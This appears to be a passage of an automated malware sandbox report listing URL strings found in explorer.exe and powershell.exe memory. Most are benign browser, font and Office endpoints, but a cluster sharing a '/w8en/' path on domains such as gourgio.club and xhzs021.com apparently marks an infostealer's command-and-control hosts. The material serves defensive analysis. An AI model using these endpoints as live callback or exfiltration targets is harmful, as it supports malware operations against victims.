              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
              Source: explorer.exe, 00000013.00000000.385406119.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
              Source: explorer.exe, 00000013.00000000.385406119.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
              Source: explorer.exe, 00000013.00000000.385406119.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
              Source: explorer.exe, 00000013.00000000.385406119.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
              Source: explorer.exe, 00000013.00000000.385406119.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
              Source: explorer.exe, 00000013.00000000.385406119.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
              Source: explorer.exe, 00000013.00000000.385406119.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
              Source: explorer.exe, 00000013.00000000.385406119.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
              Source: explorer.exe, 00000013.00000000.385406119.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
              Source: explorer.exe, 00000013.00000000.385406119.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
              Source: explorer.exe, 00000013.00000000.385406119.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
              Source: explorer.exe, 00000013.00000000.385406119.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
              Source: explorer.exe, 00000013.00000000.385406119.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
              Source: explorer.exe, 00000013.00000000.385406119.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
              Source: explorer.exe, 00000013.00000000.385406119.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.in/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.br/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.cz/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.de/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.es/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.fr/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.it/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.pl/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.ru/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.si/
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.gourgio.club
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.gourgio.club/w8en/
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.gourgio.club/w8en/M
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.gourgio.clubReferer:
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.instaespresso.com
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.instaespresso.com/w8en/
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.instaespresso.com/w8en/www.oshanskincare.com
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.instaespresso.comReferer:
              Source: explorer.exe, 00000013.00000000.385406119.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.koku-jieitai.info
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.koku-jieitai.info/w8en/
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.koku-jieitai.info/w8en/www.cardiline.store
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.koku-jieitai.infoReferer:
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.lilyrosecottage.net
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.lilyrosecottage.net/w8en/
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.lilyrosecottage.net/w8en/www.instaespresso.com
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.lilyrosecottage.netReferer:
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
              Source: explorer.exe, 00000013.00000000.384024362.0000000008640000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
              Source: explorer.exe, 00000013.00000000.375259456.0000000004E61000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
              Source: explorer.exe, 00000013.00000000.375259456.0000000004E61000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpq
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.orange.fr/
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.oshanskincare.com
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.oshanskincare.com/w8en/
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.oshanskincare.com/w8en/www.abhisclub.com
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.oshanskincare.comReferer:
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.ppc-listing.info
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.ppc-listing.info/w8en/
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.ppc-listing.info/w8en/www.koku-jieitai.info
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.ppc-listing.infoReferer:
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
              Source: explorer.exe, 00000013.00000000.385406119.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
              Source: explorer.exe, 00000013.00000000.385406119.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
              Source: explorer.exe, 00000013.00000000.385406119.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.sasayamagazine.com
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.sasayamagazine.com/w8en/
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.sasayamagazine.com/w8en/www.cjmaeilnews.com
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.sasayamagazine.comReferer:
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.thesongwriterschool.com
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.thesongwriterschool.com/w8en/
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.thesongwriterschool.com/w8en/www.anastasiamatkovskia.com
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.thesongwriterschool.comReferer:
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
              Source: explorer.exe, 00000013.00000000.385406119.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
              Source: explorer.exe, 00000013.00000000.385406119.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
              Source: explorer.exe, 00000013.00000000.385406119.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.xhzs021.com
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.xhzs021.com/w8en/
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.xhzs021.com/w8en/www.drdantherapy.com
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.xhzs021.comReferer:
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
              Source: explorer.exe, 00000013.00000000.385406119.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
              Source: powershell.exe, 00000002.00000002.376574535.000000000542F000.00000004.00000001.sdmpString found in binary or memory: https://analytics.paste.ee
              Source: powershell.exe, 00000002.00000002.376574535.000000000542F000.00000004.00000001.sdmpString found in binary or memory: https://analytics.paste.ee;
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://api.aadrm.com/
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://api.cortana.ai
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://api.diagnostics.office.com
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://api.microsoftstream.com/api/
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://api.office.net
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://api.onedrive.com
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://apis.live.net/v5.0/
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://augloop.office.com
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://augloop.office.com/v2
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://cdn.entity.
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
              Source: powershell.exe, 00000002.00000002.376574535.000000000542F000.00000004.00000001.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
              Source: powershell.exe, 00000002.00000002.376574535.000000000542F000.00000004.00000001.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://clients.config.office.net/
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://config.edge.skype.com
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
              Source: powershell.exe, 00000002.00000002.379786049.0000000006221000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000002.00000002.379786049.0000000006221000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000002.00000002.379786049.0000000006221000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://cortana.ai
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://cortana.ai/api
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://cr.office.com
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://dataservice.o365filtering.com
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://dataservice.o365filtering.com/
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://dev.cortana.ai
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://devnull.onenote.com
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://directory.services.
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
              Source: powershell.exe, 00000002.00000002.376574535.000000000542F000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com
